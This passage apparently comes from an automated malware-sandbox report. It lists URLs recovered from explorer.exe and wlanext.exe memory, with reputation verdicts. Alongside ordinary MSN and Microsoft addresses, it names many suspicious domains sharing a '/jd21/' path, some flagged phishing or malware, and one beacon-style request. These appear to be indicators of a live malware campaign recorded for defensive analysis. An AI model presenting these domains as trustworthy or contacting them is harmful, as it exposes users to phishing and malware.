                                    https://api.msn.com/v1/news/Feed/Windows?activityId=A1668CA4549A443399161CE8D2237D12&timeOut=5000&ocexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/foodanddrink/foodnews/the-best-burger-place-in-phoenix-plus-see-the-rest-oexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.msn.com/rTexplorer.exe, 00000003.00000000.1463778211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.propertiesforrentus11.bondReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://assets.msn.com/weathermapdata/1/static/weather/taskbar/animation/WeatherInsights/WeatherInsiexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.propertiesforrentus11.bond/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: phishing
                                    		unknown
                                    http://www.slab-leak-repair-74697.bondexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://word.office.comexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.pools-80761.bond/jd21/www.legendhud.shopexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.r86gd377hi.rent/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://assets.msn.com/weathermapdata/1/static/finance/1stparty/FinanceTaskbarIcons/Finance_Earningsexplorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    http://www.tvtwenty20sr.top/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.thetrue.one/jd21/www.tvtwenty20sr.topexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://android.notify.windows.com/iOSJMexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://windows.msn.com:443/shell?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPi8-darkexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.legendhud.shop/jd21/www.borghardt.xyzexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://outlook.comexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.pools-80761.bond/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.alqahtani.siteReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.apple0ficial-ld.infoReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.walk-in-tubs-30303.bond/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://android.notify.windows.com/iOSZMexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.borghardt.xyzexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.alqahtani.site/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://android.notify.windows.com/iOSexplorer.exe, 00000003.00000002.3858634071.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1469409871.000000000BDC8000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3085893372.000000000BDEA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2291497352.000000000BDE7000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://www.yelp.comexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/news/us/dumb-and-dumber-12-states-with-the-absolute-worst-education-in-theexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.slab-leak-repair-74697.bond/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Condition/MostlyClearNight.svgexplorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.cyber-eu.digitalReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.weight-loss-003.today/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/news/politics/kevin-mccarthy-s-ouster-as-house-speaker-could-cost-gop-its-explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tvtwenty20sr.topexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.r86gd377hi.rentReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tyumk.xyzexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhb-darkexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.msn.com/v1/news/Feed/Windows?z$explorer.exe, 00000003.00000003.3092275070.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1463778211.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008685000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008685000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gPfv-darkexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/lifestyle/lifestyle-buzz/what-to-do-if-a-worst-case-nuclear-scenario-actuaexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.circusenergy.onlineexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.alqahtani.site/jd21/www.propertiesforrentus11.bondexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.r86gd377hi.rentexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/news/world/a-second-war-could-easily-erupt-in-europe-while-everyone-s-distexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.thetrue.oneexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.slab-leak-repair-74697.bondReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/weather/topstories/first-map-of-earth-s-lost-continent-has-been-published/explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.walk-in-tubs-30303.bondexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.xmld101.icu/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.xmld101.icu/jd21/www.walk-in-tubs-30303.bondexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://schemas.microexplorer.exe, 00000003.00000000.1455128330.0000000002C60000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000000.1461856783.0000000007670000.00000002.00000001.00040000.00000000.sdmp, explorer.exe, 00000003.00000002.3850369503.00000000082D0000.00000002.00000001.00040000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://assets.msn.com/weathermapdata/1/static/weather/Icons/JyNGQgA=/Teaser/recordhigh.svgexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.cyber-eu.digital/jd21/www.weight-loss-003.todayexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://parade.com/61481/toriavey/where-did-hamburgers-originateexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.circusenergy.online/jd21/www.cyber-eu.digitalexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: malware
                                    		unknown
                                    http://www.tyumk.xyzReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.borghardt.xyz/jd21/explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.tvtwenty20sr.top/jd21/www.pools-80761.bondexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.msn.com/en-us/news/technology/prehistoric-comet-impacted-earth-and-triggered-the-switch-explorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://www.weight-loss-003.today/jd21/?Bl=8pSpW470ix&FjUh5xw=8QhlJgbwFiNHSz6ilu/NO/QAEgywgMMp9yv6yRexplorer.exe, 00000003.00000002.3861185504.00000000108FF000.00000004.80000000.00040000.00000000.sdmp, wlanext.exe, 00000004.00000002.3844546010.00000000042DF000.00000004.10000000.00040000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://api.msn.com/~Texplorer.exe, 00000003.00000000.1463778211.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3092275070.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290728057.0000000008796000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3851024498.0000000008796000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    https://windows.msn.com:443/shellv2?osLocale=en-GB&chosenMarketReason=ImplicitNewexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • URL Reputation: safe
                                    		unknown
                                    https://cdn.query.prod.cms.msn.com/cms/api/amp/binary/AA13gKhbexplorer.exe, 00000003.00000003.2292638548.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000000.1456566106.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000002.3848366472.0000000007065000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.3090469106.0000000007065000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.walk-in-tubs-30303.bond/jd21/www.r86gd377hi.rentexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.weight-loss-003.today/jd21/www.xmld101.icuexplorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
                                    http://www.weight-loss-003.todayReferer:explorer.exe, 00000003.00000002.3860382872.000000000C293000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290504011.000000000C25A000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 00000003.00000003.2290644114.000000000C2A2000.00000004.00000001.00020000.00000000.sdmpfalse
                                    • Avira URL Cloud: safe
                                    		unknown
